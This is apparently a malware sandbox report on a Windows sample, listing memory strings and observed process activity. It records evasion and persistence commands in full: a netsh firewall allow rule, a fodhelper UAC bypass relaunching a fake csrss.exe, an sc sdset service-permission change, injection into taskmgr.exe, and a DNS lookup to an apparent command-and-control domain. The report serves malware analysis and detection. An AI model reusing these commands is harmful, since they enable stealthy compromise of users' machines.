Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8222
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7947
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Window / User API: threadDelayed 370
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: VBoxGuest
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: vmci
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: HGFS
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: VBoxTrayIPC
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Users\user\Desktop\kdsyitkxmS.exe File opened / queried: VBoxMiniRdrDN
Source: C:\Users\user\Desktop\kdsyitkxmS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: main.isRunningInsideVMWare
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: Traffic DNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
